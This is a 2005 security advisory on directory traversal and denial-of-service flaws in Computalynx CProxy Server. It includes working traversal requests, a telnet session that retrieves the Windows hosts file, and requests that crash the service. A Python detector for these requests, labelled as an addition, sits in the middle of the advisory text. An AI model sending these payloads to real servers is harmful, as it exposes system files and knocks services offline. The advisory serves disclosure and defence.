+=========================================================================================+
| Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities            |
+=========================================================================================+
| kristof.philipsen@ubizen.com                                             March 02, 2005 |
+=========================================================================================+

AFFECTED PRODUCTS

Affected Software:
- Computalynx CProxy 3.3.x for Win32
- Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32

Possibly other software versions are affected.

IDENTIFIED ISSUES

The following issues were found to affect the aforementioned Computalynx CProxy Server
software:

[1] Directory Traversal and Arbitrary File Access Attack
[2] Denial-of-Service Attack

BRIEF DESCRIPTION

Computalynx CProxy is a Windows platform based proxy server featuring HTTP, Telnet, POP3,
SMTP and FTP proxy functions, as well as Anti Virus and Content Filtering capabilities.
Because of inadequate input validation, a malicious attacker can perform a directory
traversal attack and thus gain access to arbitrary files located on the CProxy Server
system. Moreover, using the same attack vector with specially crafted HTTP requests, it
is possible to crash the CProxy service running on the remote system.

DETAILED DESCRIPTION

Computalynx CProxy Server is a multifunctional Windows platform based proxy server with
multi-protocol support. When performing proxy functions, CProxy Server is vulnerable to a
directory traversal attack. Inadequate input validation and input filtering allows a
remote attacker to gain access to arbitrary files on the Windows system upon which the
CProxy Server software has been deployed. This first issue of directory traversal lies in
the fact that the CProxy Server fails to filter out double-dot ("..") sequences and in
turn fails to protect arbitrary files from being requested and opened through the proxy
service.
A specially crafted URL allows arbitrary files to be recovered from the system. The
retrieval of system files can compromise the entire system or expose the system to
further avenues of attack.

A malicious attacker can perform a request using the following format to gain access to
arbitrary data:

GET http:/// HTTP/1.0

An attacker can gain access to a file in the WINNT directory as shown in the following
example, by connecting to CProxy Server's proxy service (listening on TCP port 8080 by
default) and executing the following request:

ronin[kris] ~ $ telnet 10.0.0.1 8080
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0

HTTP/1.0 200 OK
Content-length: 734
Date: Sat, 19 Feb 2005 21:09:58 GMT
Date: Sat, 19 Feb 2005 21:09:58 GMT

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost
Connection closed by foreign host.

In conjunction with this method, other HTTP methods such as "POST" and "HEAD" will also
lead to arbitrary file retrieval. Retrieving an arbitrary ASCII file using the "GET"
method causes the file to be displayed and, immediately afterwards, the CProxy Server
service to crash with an error message indicating that "memory could not be read".
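One way a proxy (or a log-review script) could refuse the request shape quoted above, added here as an example and not part of the original advisory or of Computalynx's software: it treats an empty or dot-only URL authority as traversal and, going beyond the literal double-dot check the advisory names, percent-decodes and normalises the path before testing whether it climbs above its root. Function names and the sample request lines are mine; the samples are constructed from the advisory's requests plus ordinary proxy traffic.

```python
"""Traversal check for absolute-form proxy request lines.

Added example, not Computalynx or Ubizen code. A request is flagged when the URL
authority is empty or a bare dot segment (the advisory's "http://../.." vector)
or when its percent-decoded path climbs above its root. Samples are constructed."""
import re
from urllib.parse import unquote, urlsplit

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)(?:\s+HTTP/\d\.\d)?$")

def path_escapes_root(path: str) -> bool:
    """True when '..' segments take the path above its starting directory."""
    depth = 0
    for seg in unquote(path).replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def is_traversal(request_line: str) -> bool:
    """Decide whether one proxy request line matches the advisory's pattern."""
    m = REQUEST_LINE.match(request_line.strip())
    if m is None or "://" not in m.group("target"):
        return False  # malformed or origin-form request; not a proxy request
    parts = urlsplit(m.group("target"))
    if parts.netloc.strip(".") == "":
        return True  # authority is '', '.' or '..': there is no real host
    return path_escapes_root(parts.path)

def flag_traversal(lines):
    """Return the request lines that should be refused or alerted on."""
    return [line for line in lines if is_traversal(line)]

# Constructed sample: the advisory's requests mixed with ordinary proxy traffic.
SAMPLE_LINES = [
    "GET http://www.example.com/index.html HTTP/1.0",
    "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0",
    "POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0",
    "GET http://../../../../../winnt/system32/cmd.exe",
    "HEAD http://www.example.com/docs/../img/logo.gif HTTP/1.0",
    "GET http:/// HTTP/1.0",
]

if __name__ == "__main__":
    for line in flag_traversal(SAMPLE_LINES):
        print("REJECT", line)
```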
Retrieving this same ASCII file using the "POST" or "HEAD" method, however, causes the
file contents to be displayed without crashing the CProxy Server service, allowing an
attacker to execute multiple requests and thus retrieve various arbitrary files from the
CProxy Server system.

* The following request will cause the arbitrary file to be displayed:
  -> "POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

* The following request will cause the arbitrary file to be displayed and the CProxy
  Server service to crash:
  -> "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

Attempting to retrieve an executable file using any of these HTTP methods ("GET", "HEAD"
or "POST") in the aforementioned manner causes the contents of the executable file to be
displayed and the CProxy Server service to crash with an error message that "memory could
not be read", rendering the service unavailable and thus resulting in a Denial-of-Service
condition.

* Both of the following requests will cause the arbitrary executable's contents to be
  displayed and the CProxy Server service to crash:
  -> "GET http://../../../../../winnt/system32/cmd.exe"
  -> "POST http://../../../../../winnt/system32/cmd.exe"

CHARACTERISTICS

* Inadequate input validation and filtering allows an attacker to perform directory
  traversal attacks against systems running Computalynx CProxy Server.
* Different vectors of attack allow retrieval of arbitrary and possibly sensitive files
  from the system running Computalynx CProxy Server.
* Use of specially crafted URLs allows attackers to render the service unavailable,
  causing a Denial-of-Service condition.

SEVERITY

Each of these two issues affecting Computalynx CProxy Server software can directly or
indirectly allow partial or complete compromise of the system and/or the data stored on
the system running the CProxy Server software.
Moreover, the second issue, the Denial-of-Service attack against the CProxy Server
software, will directly affect any users depending on the availability of the functions
which the CProxy software performs on this system.

Classification: MEDIUM to HIGH

VENDOR STATUS

19/Feb/2005 - Computalynx contacted regarding this issue.
02/Mar/2005 - At present, the vendor has not replied regarding this issue.

SOLUTION

* Currently awaiting vendor status for a solution regarding this issue.
* A mitigation strategy against attacks of this nature would be to ensure that remote
  connections to the CProxy Server are not permitted (i.e. through the use of proper
  firewall rules).

REFERENCES

[1] "Computalynx Software" - http://www.computalynx.com

--
Kristof Philipsen
Security Engineer
Ubizen - a Cybertrust company
18 rue Robert Stumper
L-2557 Luxembourg
Luxembourg
T: +352 26 31 05 85
F: +352 26 31 05 86
E-mail: kristof.philipsen@ubizen.com
www.ubizen.com - www.cybertrust.com